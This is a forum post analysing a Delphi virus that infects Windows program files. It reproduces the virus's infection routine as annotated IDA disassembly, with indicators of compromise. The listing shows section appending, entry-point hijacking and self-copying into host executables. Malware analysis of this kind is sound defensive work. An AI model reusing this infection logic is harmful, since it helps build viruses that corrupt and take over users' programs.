[原创]一个节感染virus分析
发表于: 2009-2-18 13:06 5480
样本被破坏了……直接用 IDA 看的，大部分功能代码分析了，见 pdb 文件，这里只贴感染部分。
还剩下的一些函数就是 delphi 消息部分的函数没分析（对 delphi 不熟），和一些加密函数没看。
; ===========================================================================
; Analyst notes (review): IDA listing of the PE-infection routine of a
; Delphi file infector. Reformatted one instruction per line; the original
; Chinese comments are translated; IDA's stale parameter hints on the
; try/finally frame pushes are replaced by what those pushes really are.
; No instruction, operand or label was changed.
;
; Infection marker / IoCs visible in this listing:
;   - a final section named ".xue" with Characteristics 0E00000E0h
;     (CNT_CODE|CNT_INITIALIZED_DATA|CNT_UNINITIALIZED_DATA|MEM_EXECUTE|
;     MEM_READ|MEM_WRITE); VirtualSize == SizeOfRawData ==
;     (nullsub_2 - GetCurLineAddr) + 6E52h, neither rounded to an alignment
;   - hosts are PE files between 9C40h and 40C000h bytes with no trailing
;     data after the last section (per the author's note on GetFileFreeSpace)
;   - SizeOfImage grows by that unaligned size; the new section's VA is
;     rounded to 1000h and its raw offset to 200h with hard-coded constants,
;     the SectionAlignment/FileAlignment locals read from the header are
;     never consulted
;   - AddressOfEntryPoint is redirected into the new section; the original
;     OEP is kept in the global OrgOEP and the first dword of the 6E52h-byte
;     global block pCode is overwritten with the host's ImageBase before the
;     block is written out
; ===========================================================================
Infect proc near ; CODE XREF: infect__+1D4 p
; Wrapper around InfectFile: filters candidate hosts by size and by trailing
; free space, then returns 1 (via bl) if InfectFile reported success, else 0.
; In: eax = fileName (Delphi AnsiString).
fileName= dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
mov [ebp+fileName], eax
mov eax, [ebp+fileName]
call LStrLenAdd1 ; presumably takes a reference on the string; released by FreeMem_0 in the finally block
xor eax, eax
push ebp ; try/finally frame: saved ebp
push offset finally_do ; try/finally frame: handler address
push dword ptr fs:[eax] ; try/finally frame: previous fs:[0]
mov fs:[eax], esp ; link the frame into the SEH chain
xor ebx, ebx ; bl = return value, default 0 (not infected)
mov eax, [ebp+fileName]
call GetFileSize_0 ; eax = filesize
cmp eax, 40C000h
jg short ret_0 ; skip hosts larger than 40C000h bytes (signed compare)
cmp eax, 9C40h
jl short ret_0 ; skip hosts smaller than 9C40h bytes
mov eax, [ebp+fileName]
call GetFileFreeSpace ; author: free space between the end of the last section and the end of the file
test eax, eax
jg short ret_0 ; skip files that have such trailing space
xor edx, edx ; second register argument = 0
mov eax, [ebp+fileName]
call InfectFile ; in: eax = fileName (Delphi string); out: 0 = success, 1/2/3 = error codes
test eax, eax
jnz short ret_0 ; error
mov bl, 1 ; infected
ret_0: ; CODE XREF: Infect+2D j Infect+34 j ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx ; unlink the try/finally frame
push offset ret ; "free" below returns to ret via its retn
free: ; CODE XREF: Infect+6D j
lea eax, [ebp+fileName]
call FreeMem_0 ; release the string reference
retn
; ---------------------------------------------------------------------------
; DWORD finally_do
finally_do: ; DATA XREF: Infect+13 o
jmp @System@@HandleFinally$qqrv ; System::__linkproc__ HandleFinally(void)
; ---------------------------------------------------------------------------
jmp short free
; ---------------------------------------------------------------------------
ret: ; CODE XREF: Infect+67 j ; DATA XREF: Infect+5A o
mov eax, ebx ; 1 = infected, 0 = skipped or failed
pop ebx
pop ecx
pop ebp
retn
Infect endp
; Purpose: infect one file by appending a ".xue" section and pointing the
; entry point into it.
; In:  eax = fileName, a Delphi-format string
; Out: 0 on success; 1, 2, 3 denote different errors:
;      1 = CreateFileA failed
;      2 = missing MZ or PE signature
;      3 = file already carries a ".xue" section, or OEP lies above BaseOfData
; Attributes: bp-based frame
; BOOL __stdcall InfectFile(char *pFileName) // IDA does not understand Delphi's LStr type
InfectFile proc near ; CODE XREF: Infect+47 p
; Stack layout note: the three file buffers are contiguous —
;   pSecTab (-178h, 28h bytes) | NT headers (-150h, 0F8h bytes) | DOS header (-58h, 40h bytes).
; "lDistanceToMove" at -1Ch is offset 3Ch of the DOS header buffer, i.e. e_lfanew;
; "NumberOfBytesWritten" at -18h is the first dword past that buffer.
var_1A8= dword ptr -1A8h
var_1A4= dword ptr -1A4h
SecTabName= dword ptr -17Ch
pSecTab= byte ptr -178h
pNTHeader_Signature= dword ptr -150h
Machine= word ptr -14Ch
numOfSec= word ptr -14Ah
TimeDateStamp= dword ptr -148h
PointerOfSymTab= dword ptr -144h
NumberOfSymbols= dword ptr -140h
SizeOfOpHeader= word ptr -13Ch
Characteristics= word ptr -13Ah
Magic= word ptr -138h ; 10bh = PE32; never checked in this listing
var_136= byte ptr -136h
var_135= byte ptr -135h
SizeOfCode= dword ptr -134h
SizeInitData= dword ptr -130h
SizeUnInitData= dword ptr -12Ch
OEP = dword ptr -128h
BaseOfCode= dword ptr -124h
BaseOfData= dword ptr -120h
ImageBase= dword ptr -11Ch
SectionAlignment= dword ptr -118h ; read from the header but never used below
FileAlignment= dword ptr -114h ; read from the header but never used below
var_110= word ptr -110h
var_10E= word ptr -10Eh
var_10C= word ptr -10Ch
var_10A= word ptr -10Ah
var_108= word ptr -108h
var_106= word ptr -106h
var_104= dword ptr -104h
SizeOfImage= dword ptr -100h
SizeOfHeaders= dword ptr -0FCh ; never compared: no check that the header area has room for one more section entry
var_F8= dword ptr -0F8h
var_F4= dword ptr -0F4h
var_F0= dword ptr -0F0h
var_EC= dword ptr -0ECh
var_E8= dword ptr -0E8h
var_E4= dword ptr -0E4h
Buffer= word ptr -58h ; 40h-byte DOS header
lDistanceToMove= dword ptr -1Ch ; == e_lfanew (Buffer + 3Ch)
NumberOfBytesWritten= dword ptr -18h
NumberOfBytesRead= dword ptr -14h
cur_rva= dword ptr -10h ; running max of VirtualAddress + VirtualSize
hObject= dword ptr -0Ch
result= dword ptr -8
LStrFilePath= dword ptr -4
pFileName= dword ptr 8
arg_4= dword ptr 0Ch
arg_8= dword ptr 10h
arg_C= dword ptr 14h
arg_10= dword ptr 18h
push ebp
mov ebp, esp
add esp, 0FFFFFE84h ; esp -= 17Ch
push ebx
push esi
push edi
xor ecx, ecx
mov [ebp+SecTabName], ecx ; empty Delphi string
mov [ebp+LStrFilePath], eax
mov eax, [ebp+LStrFilePath]
call LStrLenAdd1 ; presumably takes a reference on the string
lea esi, [ebp+pSecTab] ; esi = 28h-byte IMAGE_SECTION_HEADER buffer for the whole routine
xor eax, eax
push ebp ; outer try/finally frame: saved ebp
push offset exp_handle ; outer try/finally frame: handler address
push dword ptr fs:[eax] ; outer try/finally frame: previous fs:[0]
mov fs:[eax], esp ; link the frame into the SEH chain
push 0 ; hTemplateFile
push 80h ; dwFlagsAndAttributes = FILE_ATTRIBUTE_NORMAL
push 3 ; dwCreationDisposition = OPEN_EXISTING
push 0 ; lpSecurityAttributes
push 3 ; dwShareMode = FILE_SHARE_READ | FILE_SHARE_WRITE
push 0C0000000h ; dwDesiredAccess = GENERIC_READ | GENERIC_WRITE
mov eax, [ebp+LStrFilePath]
call @System@@LStrToPChar$qqrx17System@AnsiString ; System::__linkproc__ LStrToPChar(System::AnsiString)
push eax ; lpFileName
call CreateFileA_0
mov [ebp+hObject], eax
cmp [ebp+hObject], 0FFFFFFFFh ; INVALID_HANDLE_VALUE
jnz short createfile_ok
mov [ebp+result], 1 ; error 1: could not open the file
jmp ret_0
; ---------------------------------------------------------------------------
createfile_ok: ; CODE XREF: InfectFile+5A j
xor edx, edx
push ebp ; inner try/finally frame (exp_handle_ closes the handle)
push offset exp_handle_
push dword ptr fs:[edx]
mov fs:[edx], esp
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
push 40h ; nNumberOfBytesToRead = sizeof(IMAGE_DOS_HEADER)
lea eax, [ebp+Buffer]
push eax ; lpBuffer
mov eax, [ebp+hObject]
push eax ; hFile
call ReadFile_0 ; read the DOS header (the bytes before the PE header); return value not checked
cmp [ebp+Buffer], IMAGE_DOS_SIGNATURE ; e_magic == "MZ"?
jz short MZ_ok
mov [ebp+result], 2 ; error 2: not an MZ file
call @System@@TryFinallyExit$qqrv ; System::__linkproc__ TryFinallyExit(void)
jmp ret_0
; ---------------------------------------------------------------------------
MZ_ok: ; CODE XREF: InfectFile+91 j
push 0 ; dwMoveMethod = FILE_BEGIN
push 0 ; lpDistanceToMoveHigh
mov eax, [ebp+lDistanceToMove] ; e_lfanew, taken straight from the DOS header just read (not range-checked)
push eax ; lDistanceToMove
mov eax, [ebp+hObject]
push eax ; hFile
call SetFilePointer_0
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
push 0F8h ; size of IMAGE_NT_HEADERS (PE32)
lea eax, [ebp+pNTHeader_Signature]
push eax ; lpBuffer
mov eax, [ebp+hObject]
push eax ; hFile
call ReadFile_0 ; read the PE header
cmp [ebp+pNTHeader_Signature], IMAGE_NT_SIGNATURE ; Signature == "PE\0\0"?
jz short PE_ok
mov [ebp+result], 2 ; error 2: not a PE file
call @System@@TryFinallyExit$qqrv ; System::__linkproc__ TryFinallyExit(void)
jmp ret_0
; ---------------------------------------------------------------------------
PE_ok: ; CODE XREF: InfectFile+DA j
xor edi, edi ; edi = running max of PointerToRawData + SizeOfRawData (end of section data in the file)
xor eax, eax
mov [ebp+cur_rva], eax
movzx ebx, [ebp+numOfSec]
dec ebx
test ebx, ebx
jl num_sec_zero ; NumberOfSections == 0: no section table to walk
inc ebx ; ebx = loop counter = NumberOfSections
continue_do: ; CODE XREF: InfectFile+206 j
; Section table walk. The headers are read sequentially from the current
; file position, i.e. straight after the 0F8h-byte NT headers — this assumes
; SizeOfOptionalHeader == 0E0h, which is never verified.
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
push 28h ; nNumberOfBytesToRead = sizeof(IMAGE_SECTION_HEADER)
push esi ; lpBuffer
mov eax, [ebp+hObject]
push eax ; hFile
call ReadFile_0 ; read one section header
lea eax, [ebp+SecTabName]
mov edx, esi
call @System@@LStrFromPChar$qqrr17System@AnsiStringpc ; System::__linkproc__ LStrFromPChar(System::AnsiString &,char *) — section Name as a Delphi string
mov eax, [ebp+SecTabName]
mov edx, offset name_xue ; ".xue"
call @System@@LStrCmp$qqrv ; System::__linkproc__ LStrCmp(void)
jnz raw_check ; not the marker section: accumulate sizes
; --- A ".xue" section already exists: the file is already infected. ---
; The stored body is read back and, depending on a 64-bit compare of the
; global *pTable against the global unknow_size, optionally rewritten.
; Both paths end at finally_do with result 3, so Infect treats this file as
; not (newly) infected.
push 0 ; dwMoveMethod = FILE_BEGIN
push 0 ; lpDistanceToMoveHigh
mov eax, [esi+IMAGE_SECTION_HEADER.PointerToRawData]
push eax ; lDistanceToMove
mov eax, [ebp+hObject]
push eax ; hFile
call SetFilePointer_0
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
push 6E52h ; nNumberOfBytesToRead
push offset pCode ; lpBuffer = the 6E52h-byte global data block
mov eax, [ebp+hObject]
push eax ; hFile
call ReadFile_0 ; read the stored body into pCode
mov ecx, unknow_size
cmp ecx, CodeSize
jnz short finally_do ; the two globals disagree: give up with result 3
mov eax, ecx
xor edx, edx
push edx ; [esp+4] = 0 (high dword of unknow_size)
push eax ; [esp]   = unknow_size (low dword)
mov eax, pTable
mov eax, [eax] ; eax = *pTable
cdq ; edx:eax = (int64)*pTable
cmp edx, [esp+1A8h+var_1A4] ; high dwords equal?
jnz short loc_808E47
cmp eax, [esp+1A8h+var_1A8] ; low dwords (unsigned)
pop edx
pop eax
jbe short finally_do ; *pTable <= unknow_size: nothing to refresh, result 3
jmp short WriteCode
; ---------------------------------------------------------------------------
loc_808E47: ; CODE XREF: InfectFile+184 j
pop edx
pop eax
jle short finally_do ; high dword of *pTable negative: result 3
WriteCode: ; CODE XREF: InfectFile+18D j
; *pTable > unknow_size: store *pTable into both globals and rewrite the
; 6E52h-byte block in the existing ".xue" section.
mov eax, pTable
mov eax, [eax]
mov unknow_size, eax
mov eax, pTable
mov eax, [eax]
mov CodeSize, eax
push 0 ; dwMoveMethod = FILE_BEGIN
push 0 ; lpDistanceToMoveHigh
mov eax, [esi+14h] ; IMAGE_SECTION_HEADER.PointerToRawData (IDA left the offset unresolved)
push eax ; lDistanceToMove
mov eax, [ebp+hObject]
push eax ; hFile
call SetFilePointer_0
call ReadFile_code ; not shown in this listing
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
push 6E52h ; nNumberOfBytesToWrite
push offset pCode ; lpBuffer
mov eax, [ebp+hObject]
push eax ; hFile
call WriteFile_0
finally_do: ; CODE XREF: InfectFile+170 j ; InfectFile+18B j ...
mov [ebp+result], 3 ; error 3: already infected (reached from every ".xue" path, including WriteCode)
call @System@@TryFinallyExit$qqrv ; System::__linkproc__ TryFinallyExit(void)
jmp ret_0
; ---------------------------------------------------------------------------
raw_check: ; CODE XREF: InfectFile+134 j
; edi = max(edi, PointerToRawData + SizeOfRawData)
mov eax, [esi+IMAGE_SECTION_HEADER.PointerToRawData]
add eax, [esi+IMAGE_SECTION_HEADER.SizeOfRawData]
cmp edi, eax
jnb short rva_check
mov edi, eax
rva_check: ; CODE XREF: InfectFile+1F3 j
; cur_rva = max(cur_rva, VirtualAddress + VirtualSize)
mov eax, [esi+IMAGE_SECTION_HEADER.VirtualAddress]
add eax, [esi+IMAGE_SECTION_HEADER.Misc.VirtualSize]
cmp eax, [ebp+cur_rva]
jbe short dec
mov [ebp+cur_rva], eax
dec: ; CODE XREF: InfectFile+200 j
dec ebx
jnz continue_do
num_sec_zero: ; CODE XREF: InfectFile+FE j
; After the loop esi still holds the LAST section header read; it is reused
; as the template for the new one below.
mov eax, [ebp+OEP]
cmp eax, [ebp+BaseOfData] ; author: check whether the entry point lies in the data section (unsigned compare)
jbe short loc_808EE3 ; author: entry point is normal, go add the section
mov [ebp+result], 3 ; error 3: OEP above BaseOfData
call @System@@TryFinallyExit$qqrv ; System::__linkproc__ TryFinallyExit(void)
jmp ret_0
; ---------------------------------------------------------------------------
loc_808EE3: ; CODE XREF: InfectFile+218 j
; --- Build the new section header in the esi buffer. ---
mov ebx, offset nullsub_2
sub ebx, offset GetCurLineAddr ; ebx = size of the code between GetCurLineAddr and nullsub_2
add ebx, 6E52h ; + the pCode block = total size of the appended section
mov edx, esi
mov ecx, 5 ; write the section name (4 chars + NUL)
mov eax, offset sec_name_xue ; ".xue"
call LStrCpy__ ; Delphi-style string copy: eax = src, edx = dst, ecx = size
mov eax, pTable
mov eax, [eax]
mov unknow_size, eax
mov eax, pTable
mov eax, [eax]
mov CodeSize, eax
mov [esi+IMAGE_SECTION_HEADER.Misc.PhysicalAddress], ebx ; VirtualSize (same union) = ebx
mov eax, [ebp+cur_rva]
mov [esi+IMAGE_SECTION_HEADER.VirtualAddress], eax ; placed after the highest existing section
mov [esi+IMAGE_SECTION_HEADER.SizeOfRawData], ebx
mov [esi+IMAGE_SECTION_HEADER.PointerToRawData], edi ; placed after the last section's raw data
xor eax, eax
mov [esi+IMAGE_SECTION_HEADER.PointerToRelocations], eax
xor eax, eax
mov [esi+IMAGE_SECTION_HEADER.PointerToLinenumbers], eax
mov [esi+IMAGE_SECTION_HEADER.NumberOfRelocations], 0
; NumberOfLinenumbers is not written: it keeps whatever the last section header read left there.
; Round VirtualAddress up to a hard-coded 1000h (SectionAlignment in the header is ignored).
mov eax, [esi+IMAGE_SECTION_HEADER.VirtualAddress]
mov edx, eax
and edx, 0FFFh
test edx, edx
jbe short rva_bad ; already aligned
shr eax, 0Ch
inc eax
shl eax, 0Ch
mov [esi+IMAGE_SECTION_HEADER.VirtualAddress], eax
rva_bad: ; CODE XREF: InfectFile+291 j
; Round PointerToRawData up to a hard-coded 200h (FileAlignment in the header is ignored).
mov eax, [esi+IMAGE_SECTION_HEADER.PointerToRawData]
mov edx, eax
and edx, 1FFh
test edx, edx
jbe short loc_808F6E ; already aligned
shr eax, 9
inc eax
shl eax, 9
mov [esi+IMAGE_SECTION_HEADER.PointerToRawData], eax
loc_808F6E: ; CODE XREF: InfectFile+2AA j
mov [esi+IMAGE_SECTION_HEADER.Characteristics], 0E00000E0h ; CODE|INITIALIZED_DATA|UNINITIALIZED_DATA|EXECUTE|READ|WRITE
; The file pointer is still just past the last section header read by the
; loop, so this write appends the new entry to the section table. Nothing
; checks that the header area (SizeOfHeaders) has room for it.
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
push 28h ; nNumberOfBytesToWrite
push esi ; lpBuffer
mov eax, [ebp+hObject]
push eax ; hFile
call WriteFile_0 ; append the section table entry
; --- Patch the NT headers held in the local buffer. ---
mov eax, [ebp+OEP]
mov OrgOEP, eax ; save the original OEP (global)
mov eax, [ebp+ImageBase]
mov pCode, eax ; first dword of the pCode block = host ImageBase
mov eax, [esi+IMAGE_SECTION_HEADER.VirtualAddress]
add eax, 6E52h
add eax, offset sub_8088BC
sub eax, offset GetCurLineAddr
mov [ebp+OEP], eax ; new OEP = new section VA + 6E52h + (sub_8088BC - GetCurLineAddr), i.e. the copy of sub_8088BC in the appended code
add [ebp+SizeOfImage], ebx ; grown by the raw size, not rounded to SectionAlignment
inc [ebp+numOfSec] ; NumberOfSections++
push 0 ; dwMoveMethod = FILE_BEGIN
push 0 ; lpDistanceToMoveHigh
mov eax, [ebp+lDistanceToMove] ; e_lfanew
push eax ; lDistanceToMove
mov eax, [ebp+hObject]
push eax ; hFile
call SetFilePointer_0
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
push 0F8h ; nNumberOfBytesToWrite
lea eax, [ebp+pNTHeader_Signature]
push eax ; lpBuffer
mov eax, [ebp+hObject]
push eax ; hFile
call WriteFile_0 ; write the adjusted PE header back
; --- Write the section body: pCode block, then the infector's own code copied from memory. ---
push 0 ; dwMoveMethod = FILE_BEGIN
push 0 ; lpDistanceToMoveHigh
mov eax, [esi+14h] ; IMAGE_SECTION_HEADER.PointerToRawData of the new section
push eax ; lDistanceToMove
mov eax, [ebp+hObject]
push eax ; hFile
call SetFilePointer_0
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
push 6E52h ; nNumberOfBytesToWrite
push offset pCode ; lpBuffer
mov eax, [ebp+hObject]
push eax ; hFile
call WriteFile_0 ; 6E52h bytes of pCode
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
mov eax, offset nullsub_2
sub eax, offset GetCurLineAddr
push eax ; nNumberOfBytesToWrite = nullsub_2 - GetCurLineAddr
mov eax, offset GetCurLineAddr
push eax ; lpBuffer = the running image's own code
mov eax, [ebp+hObject]
push eax ; hFile
call WriteFile_0 ; (nullsub_2 - GetCurLineAddr) bytes of code; no WriteFile result is checked anywhere in this routine
xor eax, eax
mov [ebp+result], eax ; 0 = success
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx ; unlink the inner try/finally frame
push offset ret_0 ; ret_1's retn continues at ret_0
ret_1: ; CODE XREF: InfectFile+3A4 j
mov eax, [ebp+hObject]
push eax ; hObject
call CloseHandle_0 ; inner finally: close the file
retn
; ---------------------------------------------------------------------------
exp_handle_: ; DATA XREF: InfectFile+6B o
jmp @System@@HandleFinally$qqrv ; System::__linkproc__ HandleFinally(void)
; ---------------------------------------------------------------------------
jmp short ret_1
; ---------------------------------------------------------------------------
ret_0: ; CODE XREF: InfectFile+63 j ; InfectFile+9F j ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx ; unlink the outer try/finally frame
push offset ret_writeok ; free's retn continues at ret_writeok
free: ; CODE XREF: InfectFile+3CC j
lea eax, [ebp+SecTabName]
call FreeMem_0 ; release the section-name string
lea eax, [ebp+LStrFilePath]
call FreeMem_0 ; release the file-name string reference
retn
; ---------------------------------------------------------------------------
; DWORD exp_handle
exp_handle: ; DATA XREF: InfectFile+28 o
jmp @System@@HandleFinally$qqrv ; System::__linkproc__ HandleFinally(void)
; ---------------------------------------------------------------------------
jmp short free
; ---------------------------------------------------------------------------
ret_writeok: ; CODE XREF: InfectFile+3C6 j ; DATA XREF: InfectFile+3AE o
mov eax, [ebp+result] ; 0 = success, 1/2/3 = error
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
InfectFile endp
还剩下的一些函数就是delphi消息部分的函数没分析(对delphi不熟),和一些加密函数没看